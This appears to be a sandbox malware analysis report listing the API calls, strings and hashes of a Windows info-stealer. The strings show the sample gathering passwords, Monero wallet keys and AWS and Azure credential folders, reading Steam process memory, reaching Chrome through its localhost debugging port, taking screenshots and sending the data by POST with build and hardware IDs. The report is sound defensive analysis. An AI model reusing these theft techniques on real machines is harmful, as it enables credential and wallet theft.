                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 00407F01
                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F15
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00407F2C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 00407F39
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407F50
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407F6B
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00407F77
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 00407F85
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00407F99
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00420AE3), ref: 00407FA1
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00407FBC
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 00408052
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040805C
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00408064
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040806E
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00408081
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 0040809C
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00407FC4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D20: GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D20: HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D20: wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040814E
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00408158
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040815B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$FileProcesslstrcat$lstrcpy$Free$AllocCloseHandleSleeplstrlen$AllocateCopyCreateDeleteExistsPathReadSizeSystemTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$_passwords.db
                                                                                                                                                                                                                                                                                                  • API String ID: 3968722238-2269847733

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00403003
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00402C85
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00402CC4
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00402CF4
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042150A,?,?,?,?,?,",?,?,build_id), ref: 00402EF9
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00402F16
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00402F39
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402F86
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402FD0
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00402FE4
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402FF9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                                  • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$hwid

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FE01
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FF1E
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040FF84
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,0000012E,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 0040FFC4
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 00410037
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410044
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@memset$Processstrlen$MemoryOpenQueryReadVirtual_invalid_parameter_noinfo_noreturnmemcpystrcpy
                                                                                                                                                                                                                                                                                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73$@Gc$N0ZWFt$steam.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 2915318159-3068576885
                                                                                                                                                                                                                                                                                                  • Opcode ID: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ac8410772c06d3c7cd158b0f29ba11351ce6fbe5d6182cbcead23e9eae0fd7c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AA125B16043015BDB20AA24DD84BAFBAD5AF41304F10093FF946976C2E7BD99C8839E
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,http://localhost:,00000011), ref: 004050C1
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,http://localhost:,00000011), ref: 00405123
                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET ref: 00405152
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 00405183
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 004051AD
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 004051D3
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004051E6
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004051EF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$??3@CloseFileHandleOpenReadmemcpy$strlen
                                                                                                                                                                                                                                                                                                  • String ID: "webSocketDebuggerUrl":$"ws://$-$/json$http://localhost:
                                                                                                                                                                                                                                                                                                  • API String ID: 1783597538-393890490
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410E34
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32 ref: 00410E65
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,?,?,?,?,?,?,00421509), ref: 00410F54
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410FB5
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410FBF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$EnumOpenQueryValue$lstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: - $%s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                  • API String ID: 2273887489-394048932
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041179A
                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004117A8
                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004117B5
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004117E2
                                                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 00411847
                                                                                                                                                                                                                                                                                                  • StrCmpCW.SHLWAPI(?,image/jpeg), ref: 00411878
                                                                                                                                                                                                                                                                                                  • GetHGlobalFromStream.COMBASE(?,00000000), ref: 004118E2
                                                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004118EB
                                                                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(00000000), ref: 004118FF
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00411964
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00417FAE), ref: 0041197F
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00411986
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00411993
                                                                                                                                                                                                                                                                                                  • CloseWindow.USER32(?), ref: 0041199A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSizemalloc
                                                                                                                                                                                                                                                                                                  • String ID: image/jpeg$screenshot.jpg
                                                                                                                                                                                                                                                                                                  • API String ID: 290954413-3715547155
                                                                                                                                                                                                                                                                                                  • Opcode ID: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                                  • Instruction ID: ee18476c3b49a6e7ea655472561b7fd097213a4b83d20557ae7d52cec962e0ac
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6713D71900619EFDF04AFA0DD89AEEBB79FF08304F005019FA16A7161DB759985CBE4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040149A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004014B7
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004014C5
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004014DE
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004014F9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401505
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401511
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401526
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401611
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,000000FF), ref: 004016DA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileHeap$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcatlstrcpylstrlenmemset
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$SOFTWARE\monero-project\monero-core$Wallets$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                                  • API String ID: 288866737-733413667
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf387b9fd6d19a1617bf6ae79588e661abe8b9e9c29212852f5d1e2a3c6b0dcf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f5ab2e365d18679f7850bd259ae8de3c372ef4a79097f50b908b3179d6c5dbc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf387b9fd6d19a1617bf6ae79588e661abe8b9e9c29212852f5d1e2a3c6b0dcf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70717331A10218ABCB14EFA1DD969EE7779AF48704F00405EF9016B152DBBCAEC5CBA5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 11
                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-605346811
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4649c964c2ac6d4717e2a874ab9f529b914844d538cc1ef61ec3e528cde88b08
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C11B271340310BBE7206B60EC4AF5BBAAAEB84B56F10402AF345E71E1C6B45C80CB99
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004166BC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 004166DE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 004166ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416772
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 00416794
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 004167A3
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416828
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001C), ref: 0041684A
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416859
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$memset$memcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: JB$\.IdentityService\$\.aws\$\.azure\
                                                                                                                                                                                                                                                                                                  • API String ID: 3008122021-3834632163
                                                                                                                                                                                                                                                                                                  • Opcode ID: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9794ee9d7d5702d65981f79f32deebafb897a1fd212e6a52f5b9a62acbb35f13
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF61BF71900748A7DB00EF75D9C69E97368BF98308F40925AFD056A143EB78EAC9C7D4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
